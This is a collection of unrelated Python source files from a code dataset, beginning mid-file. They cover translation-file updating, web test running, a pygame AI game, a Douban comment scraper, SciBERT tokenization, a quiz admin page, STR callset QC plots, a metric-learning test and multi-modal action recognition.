('\\n請檢查xml檔編碼是否改為UTF-8並再試一次!')\r\n input('請按任意鍵繼續。。。')\r\n print ('\\n-------------------------------------------------')\r\n print ('=====================',inputFile,'=====================')\r\n print ('-------------------------------------------------\\n')\r\n for context in root.findall('context'):\r\n for message in context.findall('message'):\r\n for index, content in enumerate(file['Source']):\r\n if 
type(file[csv_headers[count]][index]) == str:\r\n if message.find('source').text.lower() == content.lower():\r\n print ('source:',message.find('source').text,' content:' ,content)\r\n print('match:', file[csv_headers[count]][index],'\\n')\r\n message.find('translation').text = file[csv_headers[count]][index]\r\n if(message.find('translation').attrib):\r\n del message.find('translation').attrib['type']\r\n break\r\n else:\r\n if message.find('source').text.lower() == content.lower():\r\n print ('source:',message.find('source').text,' content:' ,content)\r\n print('match:', file[csv_headers[count]][index],'\\n')\r\n message.find('translation').text = ' '\r\n break\r\n #寫檔\r\n updateTree.write(inputFile,encoding ='utf-8')\r\n count += 1\r\nprint ('完成~ 已生成所有翻譯檔!!!')\r\n#input('請按任意鍵繼續。。。')\r\n ","sub_path":"Multi-Language.py","file_name":"Multi-Language.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"95892511","text":"# -*- coding: utf-8 -*-\n\nimport twsm_web_common\nimport twsm_web\nimport twsm_web_model\nimport twsm_web_dpc\nimport twsm_report\nimport time\nimport logging\nimport re\n\ncfg = twsm_web_common.get_config()\nlogging.basicConfig(level=cfg['PROJECTCONFIG']['LOGGING'],\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M:%S',\n filename=twsm_web_common.get_project_path() + 'result//logging.log',\n filemode='w')\nconsole = logging.StreamHandler()\nconsole.setLevel(cfg['PROJECTCONFIG']['LOGGING'])\nformatter = logging.Formatter('%(asctime)s %(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger('').addHandler(console)\n\ntwsm_web_common.project_start_time = time.time()\nweb = twsm_web.Twsm_Web(cfg['SERVERINFO'])\ntest = twsm_web_dpc.TwsmDPC()\nexcel_list = cfg['PROJECTCONFIG']['EXCEL_CASES'].split(',')\nfor excel in excel_list:\n logging.info(u'----------开始执行%s文件用例' % excel)\n test.setXlsFile(excel)\n cases_data = test.getXlsCaseValueForUpd()\n cases = [(k,cases_data[k]) for k in sorted(cases_data.keys())]\n for k,v in cases:\n case = twsm_web_model.Model(v)\n twsm_web_common.caseid = case.testcaseid\n web.create_log(case.testcaseid, case.description)\n logging.info(u'------------------------------------------------------------%s用例开始执行' % case.testcaseid)\n twsm_web_common.callcase(case.precommand, cases_data, web)\n web.exec_whole_case(case.precommand, case.steps, case.verify, case.postcommand,case.globals)\n twsm_web_common.project_stop_time = time.time()\n logging.info(u'------------------------------------------------------------%s用例执行结束,执行结果:%s' % (case.testcaseid, web.get_result()))\n twsm_web_common.report_list = twsm_report.add_report_data(module_name='weibo', case_id=k, case_name=k + case.description, result=web.get_result(), tester=case.tester)\n web.add_log('result', web.set_result(web.get_result()), 'complete')\n twsm_report.generate_result_html()\n","sub_path":"tools/web_tools/web_runner.py","file_name":"web_runner.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"237263043","text":"import pygame\nimport random\nfrom gridDetector import Detector\nfrom config import *\nfrom color import *\nimport sys, os\nimport pickle\ngame_folder = os.path.dirname(os.path.abspath(__file__))\n\nWIDTH = 700\nHEIGHT = 420\nFPS = 12\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 
0)\nBLUE = (0, 0, 255)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, id, neural_network = None):\n pygame.sprite.Sprite.__init__(self)\n\n self.id = id\n self.neural_network = neural_network\n self.image = pygame.Surface((60,60))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.left = 60 * random.randint(0, 4)\n self.rect.bottom = HEIGHT - 60\n self.speedx = 0\n self.touchleft = 0\n self.touchright = 0\n if self.id == 0:\n self.image = pygame.image.load(os.path.join(game_folder, \"assets/player.png\"))\n else:\n self.image = pygame.image.load(os.path.join(game_folder, \"assets/ship.png\"))\n\n def player_movement(self):\n keys=pygame.key.get_pressed()\n\n self.speedx = 0\n self.touchleft = 0\n self.touchright = 0\n \n if self.rect.right > 260:\n self.rect.left = 240\n self.touchright = 1\n\n if self.rect.left < 60:\n self.rect.left = 0\n self.touchleft = 1\n\n if keys[pygame.K_LEFT] and self.touchleft == 0:\n self.speedx = -60\n\n if keys[pygame.K_RIGHT] and self.touchright == 0:\n self.speedx = 60\n\n self.rect.x += self.speedx\n\n def make_decision(self, detector_matrix):\n X = []\n\n for x in range(7):\n for y in range(5):\n X.append(detector_matrix[x][y])\n\n\n decision = self.neural_network.calculateOutput(X) \n self.neural_network.fitness += 1\n self.speedx = 0\n self.touchleft = 0\n self.touchright = 0\n \n if self.rect.right > 260:\n self.rect.left = 240\n self.touchright = 1\n\n if self.rect.left < 60:\n self.rect.left = 0\n self.touchleft = 1\n\n if decision[0] and self.touchleft == 0:\n self.speedx = -60\n\n if decision[1] and self.touchright == 0:\n self.speedx = 60\n\n self.rect.x += self.speedx\n \n def draw(self, screen):\n screen.blit(self.image, self.rect)\n\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self, id):\n self.id = id\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((60,60))\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n self.rect.x = 60 * random.randint(0, 4)\n self.rect.y = -60 * 10 * self.id\n self.speedy = 60\n self.image = pygame.image.load(os.path.join(game_folder, \"assets/asteroid.png\"))\n self.movement = 0\n \n def update(self, game):\n self.rect.y += 60\n\n if self.rect.top > HEIGHT + 200:\n game.total_collision_object_count += 1\n self.rect.x = 60 * random.randint(0, 4)\n self.rect.y = -60 * 10 * self.id\n self.speedy = 60\n \n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n\n\nclass Game(object):\n\n def __init__(self):\n pygame.init()\n pygame.mixer.init()\n self.detector = Detector(420, 300, 60)\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Space Invaders\")\n self.clock = pygame.time.Clock()\n self.myfont = pygame.font.SysFont(\"monospace\", 15)\n self.fitness = 0\n self.total_collision_object_count = 0\n self.number_of_ai_collisions = 0\n\n self.neat = pickle.load(open(\"aiagent.p\", \"rb\"))\n self.enemy = []\n self.backgroundx1 = 0\n self.backgroundy1 = 0\n self.backgroundx2 = 0\n self.backgroundy2 = -680\n self.player = Player(0)\n self.aiagent = Player(1, self.neat)\n self.increase_enemy_counter = 0\n\n for x in range(0):\n self.enemy.append(Enemy(x))\n\n \n def desc(surf, text, x, y):\n font = pygame.font.Font('arial', size)\n text_surface = font.render(text, True, white)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x,y)\n surf.blit(text_surface, text_rect)\n\n def play(self):\n while True:\n self.on_loop()\n self.on_render()\n\n def on_loop(self): \n for event in pygame.event.get():\n if 
event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n for j, enemy in enumerate(self.enemy):\n if self.aiagent.rect.colliderect(enemy):\n self.number_of_ai_collisions += 1\n print(\"AI has collided\")\n\n if self.player.rect.colliderect(enemy):\n print(\"Player has collided\")\n\n\n for enemy in self.enemy:\n enemy.update(self)\n\n print(\"Total Number of Collision Objects: \" + str(self.total_collision_object_count))\n\n if self.number_of_ai_collisions == 0:\n print(\"Accuracy: 100%\")\n else:\n percentage = ((self.total_collision_object_count - self.number_of_ai_collisions) / self.total_collision_object_count) * 100\n print(\"Accuracy:\" + str(percentage))\n \n value = self.increase_enemy_counter % 200\n if(value == 0):\n enemy_value = self.increase_enemy_counter / 200\n self.enemy.append(Enemy(enemy_value))\n\n self.aiagent.make_decision(self.detector.matrix)\n self.player.player_movement()\n \n self.fitness += 1\n self.increase_enemy_counter += 1\n self.backgroundy1 += 16\n self.backgroundy2 += 16\n\n if self.backgroundy1 > 680:\n self.backgroundy1 = -684\n\n if self.backgroundy2 > 680:\n self.backgroundy2 = -684\n\n def on_render(self):\n # Draw / render\n self.detector.makeZero()\n self.screen.fill(BLACK)\n self.screen.blit(pygame.image.load(os.path.join(game_folder , \"assets/background.png\")), (self.backgroundx1, self.backgroundy1))\n self.screen.blit(pygame.image.load(os.path.join(game_folder , \"assets/background.png\")), (self.backgroundx2, self.backgroundy2))\n\n for enemy in self.enemy:\n enemy.draw(self.screen)\n\n self.aiagent.draw(self.screen)\n self.player.draw(self.screen)\n\n\n self.detector.fillMatrix(self)\n print(self.detector.matrix)\n\n pygame.display.update()\n self.clock.tick(FPS) \n\nif __name__ == \"__main__\":\n game = Game()\n game.play()\n\n\n","sub_path":"vsmode.py","file_name":"vsmode.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"406602049","text":"from selenium import webdriver\nimport re\nimport time\n#https://movie.douban.com/subject/30444960/comments? 
sort=new_score&status=F\n#https://movie.douban.com/subject/30444960/comments?start=20&limit=20&sort=new_score&status=F\n\ndic = dict()\nstart = 0\nlimit = 20\npages = 0\n\nmovie_id = 26426056\nfileName = 'ChenShuiMoZhou.txt'\n\nstatus = 'P'\n\nlink1 = 'https://movie.douban.com/subject/' + str(movie_id) + '/comments?'\nlink2 = 'sort=new_score&status=' + status\n\ndriver = webdriver.Chrome(executable_path='chromedriver.exe')\ndriver.get(link1 + link2)\n\ntotal = driver.find_element_by_tag_name('li.is-active')\ntotal = re.search(r'(\\d+)', total.text)\ntotal = int(total.group(0))\n\nif total % limit == 0:\n pages = total // limit\nelse:\n pages = total // limit + 1\n\nwith open(fileName, 'w+', encoding='utf-8') as f:\n for page in range(0 , pages):\n if page == 0:\n link = link1 + link2\n else:\n link = link1 + 'start=' + str(page * limit) + '&limit=' + str(limit) + '&' + link2\n\n driver.get(link)\n comments = driver.find_elements_by_tag_name('div.comment')\n for comment in comments:\n span = comment.find_element_by_tag_name('span.comment-info')\n a = span.find_element_by_tag_name('a')\n span = comment.find_element_by_tag_name('span.short')\n dic[a.text] = span.text\n time.sleep(10)\n\n for key, value in dic.items():\n f.write(key + ' : ' + value + '\\n\\n')\n f.flush()\n\n dic.clear()\n\ndriver.quit()\n\n","sub_path":"VXselenuim.py","file_name":"VXselenuim.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"514051218","text":"import sys\nsys.path.insert(0, sys.path[0]+'/..')\nimport getopt\nfrom scibert.tokenization_bert import BertTokenizer\nmodel_name = 'scibert-scivocab-uncased'\nbert_tokenizer = BertTokenizer.from_pretrained(model_name)\n\nhelp_msg = '-i -c -d ' \n\nout_corpus_path = ''\nout_dict_path = ''\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"i:c:d:\")\nexcept getopt.GetoptError:\n print(help_msg)\n sys.exit(2)\nfor opt, arg in opts:\n if opt == '-h':\n print(help_msg)\n sys.exit()\n elif opt in (\"-i\"):\n input_path = arg\n elif opt in (\"-c\"):\n out_corpus_path = arg\n elif opt in (\"-d\"):\n out_dict_path = arg\n\n\ncorpus_list = []\nidx_d2_freq = {}\nwith open(input_path) as f_in:\n for line in f_in:\n tokenized_text = line.rstrip()\n indexed_tokens = bert_tokenizer.convert_tokens_to_ids(tokenized_text.split())\n #print(tokenized_text, indexed_tokens)\n for idx in indexed_tokens:\n freq = idx_d2_freq.get(idx,0)\n idx_d2_freq[idx] = freq + 1\n corpus_list.append(' '.join(map(str,indexed_tokens)))\n\nif len(out_corpus_path) > 0:\n with open(out_corpus_path, 'w') as f_out:\n f_out.write( '\\n'.join(corpus_list) )\n\nif len(out_dict_path) > 0:\n vocab_dict = bert_tokenizer.vocab\n idx_l2_token = [''] * len(vocab_dict)\n for word in vocab_dict:\n idx = vocab_dict[word]\n idx_l2_token[idx] = word\n with open(out_dict_path, 'w') as f_out:\n for idx, freq in sorted(idx_d2_freq.items(), key = lambda x: x[1], reverse = True):\n word = idx_l2_token[idx]\n f_out.write(word+'\\t'+str(freq)+'\\t'+str(idx)+ '\\n')\n","sub_path":"src/preprocessing/map_tokens_to_indices_scibert.py","file_name":"map_tokens_to_indices_scibert.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19369318","text":"import urllib.parse\nimport db\nimport server\n\ndef add_a_question(request,response):\n# data = \"\"\"\n#
 <form method=\"POST\">\n# Question:<br>\n# <input type=\"text\" name=\"quest\"><br>\n# Option 1:<br>\n# <input type=\"text\" name=\"opt1\"><br>\n# Option 2:<br>\n# <input type=\"text\" name=\"opt2\"><br>\n# Option 3:<br>\n# <input type=\"text\" name=\"opt3\"><br>\n# Option 4:<br>\n# <input type=\"text\" name=\"opt4\"><br>\n# Answer(Enter the option number):<br>\n# <input type=\"text\" name=\"ans\"><br>\n# Score:<br>\n# <input type=\"text\" name=\"score\"><br>\n# <input type=\"submit\"> \n# </form>\n# <a href=\"/\">Back</a>\n# \"\"\"\n with open(\"./public/html/pyAddQuestion.html\", \"r\") as file_descriptor:\n res = file_descriptor.read()\n return server.send_html_handler(request, response, res)\n\ndef listForm(dictQ):\n l = []\n l.append(urllib.parse.unquote_plus(str(dictQ['quest'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt1'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt2'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt3'])))\n l.append(urllib.parse.unquote_plus(str(dictQ['opt4'])))\n l.append(dictQ['ans'])\n l.append(dictQ['score'])\n return l\n\n\ndef add_a_question_post(request,response):\n que = listForm(request['content'])\n print(request['content'])\n print(request)\n db.add_question_pyExam(que)\n data = \"\"\"\n <form method=\"POST\">\n Question:<br>\n <input type=\"text\" name=\"quest\"><br>\n Option 1:<br>\n <input type=\"text\" name=\"opt1\"><br>\n Option 2:<br>\n <input type=\"text\" name=\"opt2\"><br>\n Option 3:<br>\n <input type=\"text\" name=\"opt3\"><br>\n Option 4:<br>\n <input type=\"text\" name=\"opt4\"><br>\n Answer(Enter the option number):<br>\n <input type=\"text\" name=\"ans\"><br>\n Score:<br>\n <input type=\"text\" name=\"score\"><br>\n <input type=\"submit\"> \n </form>\n<a href=\"/\">Back</a>\n\"\"\"\n return server.send_html_handler(request, response, data)\n\ndef formatQuestions(dataItem):\n #print(\"format\")\n #print(dataItem)\n formattedQ = \"\"\"  • Question:<br>\n    \"\"\"+dataItem[1]+\"\"\"<br>\n<br>\n    Options:<br>\n 1.\"\"\"+dataItem[2]+\"\"\"<br>\n 2.\"\"\"+dataItem[3]+\"\"\"<br>\n 3.\"\"\"+dataItem[4]+\"\"\"<br>\n 4.\"\"\"+dataItem[5]+\"\"\"<br>\n<br>\n Answer: Option \"\"\"+str(dataItem[6])+\"\"\"<br>\n Score:\"\"\"+str(dataItem[7])+\"\"\"<br>\n<br>\n  • \"\"\"\n #print(\"format\")\n return formattedQ\n\ndef view_questions(request, response):\n data = db.view_questions_pyExam()\n print(data)\n list2 = list(map(formatQuestions, data))\n finalList = ''.join(list2)\n with open(\"./public/html/pyViewQuestions.html\", \"r\") as file_descriptor:\n res = file_descriptor.read()\n result = res.format(finalList)\n# htmlCode = \"\"\"\n# <html>\n# <head><title>Nemo</title></head>\n# <body>\n# <pre>\n#       %s
    \n# Back\n# \n# \"\"\" %(finalList)\n return server.send_html_handler(request, response, result)\n","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"62000360","text":"#!/usr/bin/env python3\n\"\"\"\nTool for generating various QC plots for TR callsets\n\"\"\"\n\n# Allow making plots even with no x-forward\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\n# Allow plots to be editable in Adobe Illustrator\nimport matplotlib\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\n# Imports\nimport argparse\nimport numpy as np\nimport os\nimport pandas as pd\nimport sys\nimport vcf\n\n# Load local libraries\nif __name__ == \"qcSTR\" or __name__ == '__main__' or __package__ is None:\n sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"trtools\", \"utils\"))\n import common\n import tr_harmonizer as trh\n import version\nelse: # pragma: no cover\n import trtools.utils.common as common # pragma: no cover\n import trtools.utils.tr_harmonizer as trh # pragma: no cover\n import trtools.utils.version as version\n\n__version__ = version.__version__\n\n\ndef OutputDiffRefHistogram(diffs_from_ref, fname):\n r\"\"\"Plot histogram of difference in bp from reference allele\n\n Parameters\n ----------\n diffs_from_ref : list of int\n Difference of each allele call from the ref allele (in units)\n fname : str\n Filename of output plot\n \"\"\"\n MAXPOSS = 50 # don't let histogram go beyond this\n minval = max(-1*MAXPOSS, min(diffs_from_ref))\n maxval = min(MAXPOSS, max(diffs_from_ref))\n extremeval = max(abs(minval), abs(maxval))\n bins = np.arange(-1*extremeval, extremeval, 1)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(diffs_from_ref, bins=bins, color=\"black\", edgecolor=\"white\", log=True)\n ax.set_xlabel(\"Difference from ref (rpt. units)\", size=15)\n ax.set_ylabel(\"Number of alleles\", size=15)\n fig.savefig(fname)\n plt.close()\n\ndef OutputDiffRefBias(diffs_from_ref, reflens, fname):\n r\"\"\"Plot reflen vs. 
mean difference from ref bias plot\n\n Parameters\n ----------\n diffs_from_ref : list of int\n Difference of each allele call from the ref allele (in bp)\n reflens : list of int\n List of reference allele lengths for each call (in bp)\n fname : str\n Filename of output plot\n \"\"\"\n data = pd.DataFrame({\"diff\": diffs_from_ref, \"ref\": reflens, \"count\": [1]*len(reflens)})\n data[\"ref\"] = data[\"ref\"].apply(lambda x: int(x/5)*5) # bin by 5bp\n summ = data.groupby(\"ref\", as_index=False).agg({\"diff\": np.mean, \"count\": len}).sort_values(\"ref\") # median or mean?\n summ = summ[summ[\"count\"]>=25] # exclude small counts\n trcounts = np.cumsum(summ[\"count\"])\n trfreqs = trcounts/np.sum(summ[\"count\"])\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(summ[\"ref\"], summ[\"diff\"], marker=\"o\", color=\"darkblue\")\n ax.axhline(y=0, linestyle=\"dashed\", color=\"gray\")\n ax.set_xlabel(\"Reference length (bp)\", size=15)\n ax.set_ylabel(\"Median diff from ref (bp)\", size=15)\n ax1 = ax.twinx()\n ax1.plot(summ[\"ref\"], trfreqs, color=\"darkred\")\n ax1.set_ylabel(\"Cumulative fraction of alleles\", size=15)\n fig.tight_layout()\n fig.savefig(fname)\n plt.close()\n\ndef OutputSampleCallrate(sample_calls, fname):\n r\"\"\"Plot number of calls per sample\n\n Parameters\n ----------\n sample_calls : dict of str->int\n Number of calls for each sample\n fname : str\n Filename of output plot\n \"\"\"\n samples = sample_calls.keys()\n data = pd.DataFrame({\"sample\": samples, \"numcalls\": [sample_calls[key] for key in samples]})\n #data = data.sort_values(\"numcalls\") # Commented because the order would be incorrect if sorted\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.bar(range(data.shape[0]), data[\"numcalls\"])\n ax.set_xticks(range(data.shape[0]))\n ax.set_xticklabels(samples, rotation=90)\n ax.set_ylabel(\"Number of calls\", size=15)\n fig.tight_layout()\n fig.savefig(fname)\n plt.close()\n\ndef OutputChromCallrate(chrom_calls, fname):\n r\"\"\"Plot number of calls per chromosome\n\n Parameters\n ----------\n chrom_calls : dict of str->int\n Number of calls for each chromosome\n fname : str\n Filename of output plot\n \"\"\"\n chroms = sorted(chrom_calls.keys())\n counts = [chrom_calls[chrom] for chrom in chroms]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.bar(range(len(counts)), counts)\n ax.set_xticks(range(len(counts)))\n ax.set_xticklabels(chroms, rotation=90)\n ax.set_ylabel(\"Number of calls\", size=15)\n fig.tight_layout()\n fig.savefig(fname)\n plt.close()\n\ndef getargs(): # pragma: no cover\n parser = argparse.ArgumentParser(__doc__)\n ### Required arguments ###\n req_group = parser.add_argument_group(\"Required arguments\")\n req_group.add_argument(\"--vcf\", help=\"VCF file to analyze.\", type=str, required=True)\n req_group.add_argument(\"--out\", help=\"Output prefix for files generated\", type=str, required=True)\n req_group.add_argument(\"--vcftype\", help=\"Options=%s\"%[str(item) for item in trh.VCFTYPES.__members__], type=str, default=\"auto\")\n filter_group = parser.add_argument_group(\"Filtering group\")\n filter_group.add_argument(\"--samples\", help=\"File containing list of samples to include\", type=str)\n filter_group.add_argument(\"--period\", help=\"Only consider repeats with this motif length\", type=int)\n debug_group = parser.add_argument_group(\"Debug group\")\n debug_group.add_argument(\"--numrecords\", help=\"Only process this many records\", type=int)\n ver_group = parser.add_argument_group(\"Version\")\n 
ver_group.add_argument(\"--version\", action=\"version\", version = '{version}'.format(version=__version__))\n args = parser.parse_args()\n return args\n\ndef main(args):\n if not os.path.exists(args.vcf):\n common.WARNING(\"%s does not exist\"%args.vcf)\n return 1\n # Set up reader and harmonizer\n invcf = vcf.Reader(filename=args.vcf)\n if args.vcftype != 'auto':\n vcftype = trh.VCFTYPES[args.vcftype]\n else:\n vcftype = trh.InferVCFType(invcf)\n\n # Load samples\n if args.samples:\n samplelist = [item.strip() for item in open(args.samples, \"r\").readlines()]\n else: samplelist = invcf.samples\n \n # Set up data to keep track of\n sample_calls = dict([(sample, 0) for sample in samplelist]) # sample->numcalls\n contigs = invcf.contigs\n if len(contigs) == 0:\n common.MSG(\"Warning: no contigs found in VCF file.\")\n chrom_calls = dict([(chrom, 0) for chrom in contigs]) # chrom->numcalls\n diffs_from_ref = [] # for each allele call, keep track of diff (bp) from ref\n diffs_from_ref_unit = [] # for each allele call, keep track of diff (units) from ref\n reflens = [] # for each allele call, keep track of reference length (bp)\n\n numrecords = 0\n for record in invcf:\n if args.numrecords is not None and numrecords >= args.numrecords: break\n chrom = record.CHROM\n trrecord = trh.HarmonizeRecord(vcftype, record)\n if args.period is not None and len(trrecord.motif) != args.period: continue\n # Extract stats\n rl = len(trrecord.ref_allele)\n allele_counts = trrecord.GetAlleleCounts(uselength=False, samplelist=samplelist)\n called_samples = [item.sample for item in record if item.called]\n # Update data\n num_calls = 0\n for s in called_samples:\n try:\n sample_calls[s] += 1\n num_calls += 1\n except KeyError: pass\n chrom_calls[chrom] = chrom_calls.get(chrom, 0) + num_calls\n for allele in allele_counts.keys():\n allelediff = len(allele)-rl\n count = allele_counts[allele]\n reflens.extend([rl]*count)\n diffs_from_ref.extend([allelediff]*count)\n diffs_from_ref_unit.extend([allelediff/len(trrecord.motif)]*count)\n numrecords += 1\n\n OutputDiffRefHistogram(diffs_from_ref_unit, args.out + \"-diffref-histogram.pdf\")\n OutputDiffRefBias(diffs_from_ref, reflens, args.out + \"-diffref-bias.pdf\")\n OutputSampleCallrate(sample_calls, args.out+\"-sample-callnum.pdf\")\n OutputChromCallrate(chrom_calls, args.out+\"-chrom-callnum.pdf\")\n return 0\n\ndef run(): # pragma: no cover\n args = getargs()\n retcode = main(args)\n sys.exit(retcode)\n\nif __name__ == \"__main__\": # pragma: no cover\n run()\n","sub_path":"qcSTR/qcSTR.py","file_name":"qcSTR.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"616960232","text":"import sys\nimport re\nimport math\ns=sys.stdin.read()\ndigits=re.findall(r\"\\d+\",s)\nlistline= [int(e) for e in digits ]\nn=listline[0] \ndel(listline[0])\nlistline.sort()\ncount=0\ntime=0\nfor i in range(n):\n if time<=listline[i]:\n count+=1\n time+=listline[i]\nprint(count)","sub_path":"Code/CodeRecords/2814/60753/242042.py","file_name":"242042.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"215451876","text":"import re\nif __name__ == '__main__':\n txts = []\n spll = []\n for _ in range(int(input())):\n txts.append(input())\n for _ in range(int(input())):\n uk = input()\n us = uk.replace('our', 'or')\n matcher = re.compile(\"({}|{})( |$)\".format(uk, us))\n cnt = 0\n for string in 
txts:\n cnt += len(matcher.findall(string))\n print(cnt)\n","sub_path":"HackerRank/Regexp/Application/21UKAndUSASpellingStyles/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"289184993","text":"import unittest\r\nimport torch\r\nfrom pytorch_metric_learning.miners import BatchHardMiner\r\nfrom pytorch_metric_learning.utils import common_functions as c_f\r\n\r\nclass TestBatchHardMiner(unittest.TestCase):\r\n\r\n @classmethod\r\n def setUpClass(self):\r\n self.dist_miner = BatchHardMiner(use_similarity=False, normalize_embeddings=False)\r\n self.sim_miner = BatchHardMiner(use_similarity=True, normalize_embeddings=True)\r\n self.labels = torch.LongTensor([0, 0, 1, 1, 0, 2, 1, 1, 1])\r\n self.correct_a = torch.LongTensor([0, 1, 2, 3, 4, 6, 7, 8])\r\n self.correct_p = torch.LongTensor([4, 4, 8, 8, 0, 2, 2, 2])\r\n self.correct_n = [torch.LongTensor([2, 2, 1, 4, 3, 5, 5, 5]), torch.LongTensor([2, 2, 1, 4, 5, 5, 5, 5])]\r\n\r\n def test_dist_mining(self):\r\n embeddings = torch.arange(9).float().unsqueeze(1)\r\n a, p, n = self.dist_miner(embeddings, self.labels)\r\n self.helper(a, p, n)\r\n\r\n def test_sim_mining(self):\r\n angles = [0, 10, 20, 30, 40, 50, 60, 70, 80]\r\n embeddings = torch.FloatTensor([c_f.angle_to_coord(a) for a in angles])\r\n a, p, n = self.sim_miner(embeddings, self.labels)\r\n self.helper(a, p, n)\r\n\r\n def helper(self, a, p, n):\r\n self.assertTrue(torch.equal(a, self.correct_a))\r\n self.assertTrue(torch.equal(p, self.correct_p))\r\n self.assertTrue(any(torch.equal(n, cn) for cn in self.correct_n))\r\n\r\n def test_empty_output(self):\r\n batch_size = 32\r\n embeddings = torch.randn(batch_size, 64)\r\n labels = torch.arange(batch_size)\r\n a, p, n = self.dist_miner(embeddings, labels)\r\n self.assertTrue(len(a)==0)\r\n self.assertTrue(len(p)==0)\r\n self.assertTrue(len(n)==0)\r\n\r\n a, p, n = self.sim_miner(embeddings, labels)\r\n self.assertTrue(len(a)==0)\r\n self.assertTrue(len(p)==0)\r\n self.assertTrue(len(n)==0)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"tests/miners/test_batch_hard_miner.py","file_name":"test_batch_hard_miner.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"240462376","text":"import os\nimport random\nimport torch\nfrom collections import Counter\nfrom PIL import Image\nfrom skeleton_model import HCN\nfrom torchvision.transforms import transforms\nfrom torchvision.models.resnet import resnet18, resnet101\nfrom data_load_utils import parse_label, extract_data\n\n\nNUM_CLASSES = 51\n\n# modal, models architecture and checkpoints\nmodals = ['skeleton', 'rgb', 'optical_flow', 'depth', 'infrared', 'infrared_depth']\nmodels_checkpoints = {\n 'skeleton': (HCN(), 'checkpoints/skeleton.pt'),\n 'rgb': (resnet101(num_classes=NUM_CLASSES), 'checkpoints/rgb.pt'),\n 'optical_flow': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/optical_flow.pt'),\n 'depth': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/depth.pt'),\n 'infrared': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/infrared.pt'),\n 'infrared_depth': (resnet18(num_classes=NUM_CLASSES), 'checkpoints/infrared_depth.pt')\n}\n\ndata_transforms = transforms.Compose([\n transforms.Resize(255),\n transforms.RandomCrop(224),\n transforms.ToTensor()\n])\n\n\ndef model_load_checkpoint():\n loaded_models = {}\n for modal in modals:\n model, 
checkpoint_path = models_checkpoints[modal]\n model.load_state_dict(torch.load(checkpoint_path, map_location='cpu'))\n model.eval()\n loaded_models[modal] = model\n return loaded_models\n\n\ndef predict(models, inputs):\n choices = []\n for modal in modals:\n print('predicting modal - {0}...'.format(modal))\n model, x = models[modal], inputs[modal]\n if modal == 'skeleton':\n x = torch.tensor(x).float()\n x = x.unsqueeze(0)\n else:\n x = Image.fromarray(x.astype('uint8')).convert('RGB')\n x = data_transforms(x).float()\n x = x.unsqueeze(0)\n output = model(x)\n _, prediction = torch.max(output, 1)\n print(' > modal - {0}: {1}'.format(modal, prediction))\n choices.append(prediction.item())\n # count votes and random select if more than one candidate\n counter = Counter(choices)\n print('vote result:', counter)\n most_vote = max(counter.values())\n options = []\n for k, v in counter.items():\n if v == most_vote:\n options.append(k)\n return random.choice(options)\n\n\nif __name__ == '__main__':\n models = model_load_checkpoint()\n print('model initialization finished and parameters loaded...')\n\n data_dir = './data_sample'\n label_file_path = os.path.join(data_dir, 'label.txt')\n num_actions, action_classes, start_frames, end_frames = parse_label(label_file_path)\n\n random_index = random.randint(1, num_actions) - 1\n cur_action_class = action_classes[random_index]\n s_timestamp, e_timestamp = start_frames[random_index], end_frames[random_index]\n multi_modal_inputs = extract_data(data_dir, s_timestamp, e_timestamp)\n print('ground truth label:', cur_action_class - 1)\n prediction = predict(models, multi_modal_inputs)\n print('voting result:', 